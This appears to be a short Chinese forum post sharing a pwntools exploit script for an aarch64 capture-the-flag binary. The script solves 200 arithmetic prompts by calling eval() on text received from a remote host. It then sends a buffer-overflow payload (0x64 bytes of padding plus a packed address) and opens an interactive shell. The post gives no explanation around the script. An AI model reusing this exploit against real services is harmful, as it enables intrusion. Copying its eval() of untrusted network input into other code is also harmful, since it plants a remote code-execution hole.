贴个脚本

表达式计算脚本

# -*- coding: utf-8 -*-
from pwn import *
import sys
import time
context.binary = "./pwn"
binary = './pwn'

if sys.argv[1] == "r":
    p = remote("39.97.210.182",40285)
elif sys.argv[1] == "l":
    p = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", binary])
else:
    p = process(["qemu-aarch64", "-g", "1234", "-L", "/usr/aarch64-linux-gnu/", binary])

elf = ELF("./pwn")

time = 0

def pwn():
    p.recvuntil("Math:")
    data = p.recvuntil(' =')
    data = data[:-1]
    print "data:" + str(data)
    return eval(data)


for i in range(0,200):
    result = pwn()
    print "result:" + str(result)
    p.sendline(str(result))
    time = time + 1
    print "times:" + str(time)

p.sendline("a"*0x64 + p64(0x12235612))
p.interactive()